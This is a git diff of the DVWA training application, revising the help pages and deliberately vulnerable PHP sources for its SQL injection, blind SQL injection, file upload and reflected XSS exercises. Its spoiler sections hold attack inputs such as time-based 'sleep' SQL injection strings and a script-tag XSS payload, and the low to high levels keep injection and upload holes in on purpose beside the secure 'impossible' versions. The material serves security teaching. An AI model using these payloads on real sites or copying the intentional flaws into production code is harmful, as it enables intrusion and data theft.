      • -
    • ".dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/SQL_Injection' )."
      • -
    • ".dvwaExternalLinkUrlGet( 'http://bobby-tables.com/' )."
      • +
    • " . dvwaExternalLinkUrlGet( 'http://www.securiteam.com/securityreviews/5DP0N1P76E.html' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/SQL_Injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'http://bobby-tables.com/' ) . "
    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/sqli/session-input.php b/vulnerabilities/sqli/session-input.php index c1059d95e..f11436beb 100644 --- a/vulnerabilities/sqli/session-input.php +++ b/vulnerabilities/sqli/session-input.php @@ -1,17 +1,17 @@

    "; - $page[ 'body' ] .= "Session ID: " . $_SESSION[ 'id' ] . "


    "; + $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}


    "; $page[ 'body' ] .= ""; } diff --git a/vulnerabilities/sqli/source/high.php b/vulnerabilities/sqli/source/high.php index f8e877c5a..092c9b41c 100644 --- a/vulnerabilities/sqli/source/high.php +++ b/vulnerabilities/sqli/source/high.php @@ -1,26 +1,29 @@ Something went wrong.' ); - sleep ( rand( 0, 2 ) ); - + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
    ";
-		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}";
-		$html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli/source/impossible.php b/vulnerabilities/sqli/source/impossible.php index 70486fbdf..41e57c10c 100644 --- a/vulnerabilities/sqli/source/impossible.php +++ b/vulnerabilities/sqli/source/impossible.php @@ -4,18 +4,25 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Retrieve data + // Get input $id = $_GET[ 'id' ]; + // Was a number entered? if(is_numeric( $id )) { - $data = $db->query( 'SELECT first_name, last_name FROM users WHERE user_id = ' . $db->quote( $id ) ); - foreach( $data as $i ) { - $first = $i[ 'first_name' ]; - $last = $i[ 'last_name' ]; + // Check the database + $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + $row = $data->fetch(); - $html .= "
    ";
-			$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}";
-			$html .= "
    "; + // Make sure only 1 result is returned + if( $data->rowCount() == 1 ) { + // Get values + $first = $row[ 'first_name' ]; + $last = $row[ 'last_name' ]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; } } } diff --git a/vulnerabilities/sqli/source/low.php b/vulnerabilities/sqli/source/low.php index 2fb6eeccf..4094cec27 100644 --- a/vulnerabilities/sqli/source/low.php +++ b/vulnerabilities/sqli/source/low.php @@ -1,24 +1,29 @@ ' . mysql_error() . '' ); + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
    ";
-		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}";
-		$html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli/source/medium.php b/vulnerabilities/sqli/source/medium.php index 790b076b0..2ef9eef9c 100644 --- a/vulnerabilities/sqli/source/medium.php +++ b/vulnerabilities/sqli/source/medium.php @@ -1,25 +1,30 @@ ' . mysql_error() . '' ); + // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { + // Display values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); - $html .= "
    ";
-		$html .= "ID: {$id}
    First name: {$first}
    Surname: {$last}";
-		$html .= "
    "; + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + // Increase loop count $i++; } + + //mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/cookie-input.php b/vulnerabilities/sqli_blind/cookie-input.php index ce55a8828..5e31aa2bf 100644 --- a/vulnerabilities/sqli_blind/cookie-input.php +++ b/vulnerabilities/sqli_blind/cookie-input.php @@ -1,12 +1,12 @@
    -

    When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. - Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, - they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data - by asking a series of True and False questions through SQL statements.

    +

    About

    +

    When an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. + Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, + they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. + An attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response + (valid entry retunred or 404 header set).

    -

    The 'id' variable within this PHP script is vulnerable to SQL injection.

    +

    "time based" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack). + This means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful.

    -

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!

    +

    -

    If you have received a Magicquotes error, turn them off in php.ini.

    +

    Objective

    +

    Find the version of the SQL database software through a blind SQL attack.

    + +

    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    + 
    Spoiler: ?id=1' AND sleep 5&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    + 
    Spoiler: ?id=1 AND sleep 3&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being set on a different page, rather than a GET request.

    + 
    Spoiler: ID: 1' AND sleep 10&Submit=Submit.
+			Spoiler: Should be able to cut out the middle man..
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    @@ -23,5 +58,5 @@
    -

    Reference: https://www.owasp.org/index.php/Blind_SQL_Injection

    +

    Reference:

    diff --git a/vulnerabilities/sqli_blind/index.php b/vulnerabilities/sqli_blind/index.php index 489d348eb..ad5dff98a 100644 --- a/vulnerabilities/sqli_blind/index.php +++ b/vulnerabilities/sqli_blind/index.php @@ -1,18 +1,19 @@ Magic Quotes are on, you will not be able to inject SQL."; + $WarningHtml .= "
    The PHP function \"Magic Quotes\" is enabled.
    "; +} +// Is PHP function safe_mode enabled? +if( ini_get( 'safe_mode' ) == true ) { + $WarningHtml .= "
    The PHP function \"Safe mode\" is enabled.
    "; } - -$method = 'GET'; -if( $vulnerabilityFile == 'medium.php' ) - $method = 'POST'; $page[ 'body' ] .= "

    Vulnerability: SQL Injection (Blind)

    - {$magicQuotesWarningHtml} + {$WarningHtml}
    "; -if( $vulnerabilityFile == 'high.php' ){ +if( $vulnerabilityFile == 'high.php' ) { $page[ 'body' ] .= "Click here to change your ID."; } else { @@ -56,8 +58,8 @@

    User ID:"; - if( $vulnerabilityFile == 'medium.php' ){ - $page[ 'body' ] .= " "; $query = "SELECT COUNT(*) FROM users;"; $result = mysql_query( $query ) or die( '

    ' . mysql_error() . '
    ' ); $num = mysql_result( $result, 0 ); @@ -66,11 +68,10 @@ $page[ 'body' ] .= ""; } else - $page[ 'body' ] .= " "; + $page[ 'body' ] .= "\n "; - $page[ 'body' ] .= " -

    " -; + $page[ 'body' ] .= "\n +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -84,15 +85,14 @@

    More Information

    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/sqli_blind/source/high.php b/vulnerabilities/sqli_blind/source/high.php index 41f0ad97c..ce2590107 100644 --- a/vulnerabilities/sqli_blind/source/high.php +++ b/vulnerabilities/sqli_blind/source/high.php @@ -1,23 +1,33 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { + // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); - header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); } + + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/source/impossible.php b/vulnerabilities/sqli_blind/source/impossible.php index 2e7fe7888..25cb7cf31 100644 --- a/vulnerabilities/sqli_blind/source/impossible.php +++ b/vulnerabilities/sqli_blind/source/impossible.php @@ -4,16 +4,26 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Retrieve data + // Get input $id = $_GET[ 'id' ]; + // Was a number entered? if(is_numeric( $id )) { - $data = $db->query( 'SELECT first_name, last_name FROM users WHERE user_id = ' . $db->quote( $id ) ); - if( count( $data->fetchAll() ) > 0 ) { + // Check the database + $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + + // Get results + if( $data->rowCount() == 1 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { + // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } } diff --git a/vulnerabilities/sqli_blind/source/low.php b/vulnerabilities/sqli_blind/source/low.php index 38071b90f..b73eecc39 100644 --- a/vulnerabilities/sqli_blind/source/low.php +++ b/vulnerabilities/sqli_blind/source/low.php @@ -1,20 +1,28 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { + // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + mysql_close(); } ?> diff --git a/vulnerabilities/sqli_blind/source/medium.php b/vulnerabilities/sqli_blind/source/medium.php index b327d78a9..9d77fa683 100644 --- a/vulnerabilities/sqli_blind/source/medium.php +++ b/vulnerabilities/sqli_blind/source/medium.php @@ -1,21 +1,26 @@ 0 ) { + // Feedback for end user $html .= '
    User ID exists in the database.
    '; } else { - // header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + // Feedback for end user $html .= '
    User ID is MISSING from the database.
    '; } + + //mysql_close(); } ?> diff --git a/vulnerabilities/upload/help/help.php b/vulnerabilities/upload/help/help.php index 588e563a0..c4aee9884 100644 --- a/vulnerabilities/upload/help/help.php +++ b/vulnerabilities/upload/help/help.php @@ -5,13 +5,42 @@
    -

    Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. - Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

    +

    About

    +

    Uploaded files represent a significant risk to web applications. The first step in many attacks is to get some code to the system to be attacked. + Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

    The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, - and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

    + and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

    -

    Another thing worth looking for are restrictions within 'hidden' form fields.

    +

    + +

    Objective

    +

    Execute any PHP function of your choosing on the target system (such as + or ) thanks to this file upload vulnerability.

    + +

    + +

    Low Level

    +

    Low level will not check the contents of the file being uploaded in any way. It relies only on trust.

    + 
    Spoiler: Upload any valid PHP file with command in it.
    + +
    + +

    Medium Level

    +

    When using the medium level, it will check the reported file type from the client when its being uploaded.

    + 
    Spoiler: Worth looking for any restrictions within any "hidden" form fields.
    + +
    + +

    High Level

    +

    Once the file has been received from the client, the server will try to resize any image that was included in the request.

    + 
    Spoiler: need to link in another vulnerability, such as file includion.
    + +
    + +

    Impossible Level

    +

    This will check everything from all the levels so far, as well then to re-encode the image. This will make a new image, therefor stripping + any "non-image" code (including metadata).
    @@ -20,6 +49,6 @@
    -

    Reference: https://www.owasp.org/index.php/Unrestricted_File_Upload

    +

    Reference:

    diff --git a/vulnerabilities/upload/index.php b/vulnerabilities/upload/index.php index c6ab46431..442a7b04c 100644 --- a/vulnerabilities/upload/index.php +++ b/vulnerabilities/upload/index.php @@ -1,12 +1,12 @@ Incorrect folder permissions: " . realpath( dirname( dirname( getcwd() ) ) )."/hackable/uploads/" . ""; +$WarningHtml = ''; +if( is_writable( realpath( dirname( dirname( getcwd() ) ) ) . "/hackable/uploads/" ) == false ) { + $WarningHtml .= "
    Incorrect folder permissions: " . realpath( dirname( dirname( getcwd() ) ) ) . "/hackable/uploads/" . "
    Folder is not writable.
    "; +} +// Is PHP-GD installed? +if( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) { + $WarningHtml .= "
    The PHP module PHP-GD is not installed.
    "; } $page[ 'body' ] .= "

    Vulnerability: File Upload

    - {$writableFolderWarningHtml} + {$WarningHtml}
    @@ -49,8 +53,7 @@ Choose an image to upload:



    - -"; + \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -62,13 +65,12 @@

    More Information

    "; - dvwaHtmlEcho( $page ); ?> diff --git a/vulnerabilities/upload/source/high.php b/vulnerabilities/upload/source/high.php index 5330280fa..65376a33a 100644 --- a/vulnerabilities/upload/source/high.php +++ b/vulnerabilities/upload/source/high.php @@ -1,29 +1,35 @@ '; + // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { - if(!move_uploaded_file( $uploaded_tmp, $target_path )) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { + // No + $html .= '
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } } else { - $html .= 'Your image was not uploaded. We only accept JPEG or PNG images.'; + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; } - $html .= ''; } ?> diff --git a/vulnerabilities/upload/source/impossible.php b/vulnerabilities/upload/source/impossible.php index 0b622d904..bea20378c 100644 --- a/vulnerabilities/upload/source/impossible.php +++ b/vulnerabilities/upload/source/impossible.php @@ -4,51 +4,56 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); + + // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; + + // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; - $html .= '
    ';
+	// Is it an image?
 	if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
 		( $uploaded_size < 100000 ) &&
 		( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
 		getimagesize( $uploaded_tmp ) ) {
 
-		// Strip any metadata (using Imagick is recommended over GD)
-		if ( $uploaded_type == 'image/jpeg' ) {
+		// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
+		if( $uploaded_type == 'image/jpeg' ) {
 			$img = imagecreatefromjpeg( $uploaded_tmp );
 			imagejpeg( $img, $temp_file, 100);
 		}
 		else {
 			$img = imagecreatefrompng( $uploaded_tmp );
 			imagepng( $img, $temp_file, 9);
-
 		}
 		imagedestroy( $img );
 
-		// Move the file to the web root from the temp folder
-		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ){
-			$html .= "${target_file} succesfully uploaded!";
+		// Can we move the file to the web root from the temp folder?
+		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
+			// Yes!
+			$html .= "
    ${target_file} succesfully uploaded!
    ";
 		}
-		else{
-			$html .= 'Your image was not uploaded.';
+		else {
+			// No
+			$html .= '
    Your image was not uploaded.
    ';
 		}
 
 		// Delete any temp files
-		if ( file_exists( $temp_file ) )
+		if( file_exists( $temp_file ) )
 			unlink( $temp_file );
 	}
 	else {
-		$html .= 'Your image was not uploaded. We only accept JPEG or PNG images.';
+		// Invalid file
+		$html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    ';
 	}
-	$html .= '
    '; } // Generate Anti-CSRF token diff --git a/vulnerabilities/upload/source/low.php b/vulnerabilities/upload/source/low.php index 953fc7cce..904403b21 100644 --- a/vulnerabilities/upload/source/low.php +++ b/vulnerabilities/upload/source/low.php @@ -1,17 +1,19 @@ '; - if(!move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { + // No + $html .= '
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } - $html .= ''; } ?> diff --git a/vulnerabilities/upload/source/medium.php b/vulnerabilities/upload/source/medium.php index 02529ae80..66f3bc8f2 100644 --- a/vulnerabilities/upload/source/medium.php +++ b/vulnerabilities/upload/source/medium.php @@ -1,27 +1,33 @@ '; + // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { - if(!move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { + // No + $html .= '
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } } else { - $html .= 'Your image was not uploaded. We only accept JPEG or PNG images.'; + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; } - $html .= ''; } ?> diff --git a/vulnerabilities/view_help.php b/vulnerabilities/view_help.php index 936e2b4a3..2a6e14188 100644 --- a/vulnerabilities/view_help.php +++ b/vulnerabilities/view_help.php @@ -1,23 +1,25 @@ ' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . ' {$help} -
    -"; +\n"; dvwaHelpHtmlEcho( $page ); diff --git a/vulnerabilities/view_source.php b/vulnerabilities/view_source.php index af03b1a8c..aea076ad3 100644 --- a/vulnerabilities/view_source.php +++ b/vulnerabilities/view_source.php @@ -1,12 +1,12 @@ - +
    ".highlight_string( $source, true )."
    " . highlight_string( $source, true ) . "
    @@ -62,8 +62,7 @@ - -"; +\n"; dvwaSourceHtmlEcho( $page ); diff --git a/vulnerabilities/view_source_all.php b/vulnerabilities/view_source_all.php index 816573af9..9ce248468 100644 --- a/vulnerabilities/view_source_all.php +++ b/vulnerabilities/view_source_all.php @@ -1,12 +1,12 @@ - -"; +\n"; dvwaSourceHtmlEcho( $page ); diff --git a/vulnerabilities/xss_r/help/help.php b/vulnerabilities/xss_r/help/help.php index a3565be66..ffb38400c 100644 --- a/vulnerabilities/xss_r/help/help.php +++ b/vulnerabilities/xss_r/help/help.php @@ -1,19 +1,50 @@
    -

    Help - Cross Site Scripting (XSS)

    +

    Help - Cross Site Scripting (Reflected)

    -

    Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. - Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. - Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

    +

    About

    +

    "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it.

    -

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. - Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with - that site. These scripts can even rewrite the content of the HTML page.

    +

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

    -

    Example: http://127.0.0.1/dvwa/xss.php?name=javascript

    +

    Because its a reflected XSS, the malicious code is not stored in the remote web application, so requires some social engineering (such as a link via email/chat).

    + +

    + +

    Objective

    +

    One way or another, steal the cookie of a logged in user.

    + +

    + +

    Low Level

    +

    Low level will not check the requested input, before including it to be used in the output text.

    + 
    Spoiler: ?name=<script>alert("XSS");</script>.
    + +
    + +

    Medium Level

    +

    The developer has tried to add a simple pattern matching to remove any references to "<script>", to disable any JavaScript.

    + 
    Spoiler: Its cAse sENSiTiVE.
    + +
    + +

    High Level

    +

    The developer now believes they can disable all JavaScript by removing the pattern "<s*c*r*i*p*t".

    + 
    Spoiler: HTML events.
    + +
    + +

    Impossible Level

    +

    Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input.
    @@ -22,5 +53,5 @@
    -

    Reference: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

    +

    Reference:

    diff --git a/vulnerabilities/xss_r/index.php b/vulnerabilities/xss_r/index.php index cc5697d64..25686ef16 100644 --- a/vulnerabilities/xss_r/index.php +++ b/vulnerabilities/xss_r/index.php @@ -1,12 +1,12 @@ @@ -41,8 +41,7 @@ What's your name? -

    -"; +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -54,14 +53,13 @@

    More Information

    -
    -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/xss_r/source/high.php b/vulnerabilities/xss_r/source/high.php index ae88f9853..be918c3b5 100644 --- a/vulnerabilities/xss_r/source/high.php +++ b/vulnerabilities/xss_r/source/high.php @@ -1,9 +1,12 @@ '; - $html .= 'Hello ' . preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); - $html .= ''; + // Get input + $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); + + // Feedback for end user + $html .= "
    Hello ${name}
    "; } ?> diff --git a/vulnerabilities/xss_r/source/impossible.php b/vulnerabilities/xss_r/source/impossible.php index fe4f09374..2651802e3 100644 --- a/vulnerabilities/xss_r/source/impossible.php +++ b/vulnerabilities/xss_r/source/impossible.php @@ -1,12 +1,15 @@ '; - $html .= 'Hello ' . htmlspecialchars( $_GET[ 'name' ] ); - $html .= ''; + // Get input + $name = htmlspecialchars( $_GET[ 'name' ] ); + + // Feedback for end user + $html .= "
    Hello ${name}
    "; } // Generate Anti-CSRF token diff --git a/vulnerabilities/xss_r/source/low.php b/vulnerabilities/xss_r/source/low.php index dafdc9652..3c72d3782 100644 --- a/vulnerabilities/xss_r/source/low.php +++ b/vulnerabilities/xss_r/source/low.php @@ -1,9 +1,9 @@ '; - $html .= 'Hello ' . $_GET[ 'name' ]; - $html .= ''; + // Feedback for end user + $html .= '
    Hello ' . $_GET[ 'name' ] . '
    '; } ?> diff --git a/vulnerabilities/xss_r/source/medium.php b/vulnerabilities/xss_r/source/medium.php index 19369a63f..38bc4a9ca 100644 --- a/vulnerabilities/xss_r/source/medium.php +++ b/vulnerabilities/xss_r/source/medium.php @@ -1,9 +1,12 @@ '; - $html .= 'Hello ' . str_replace( '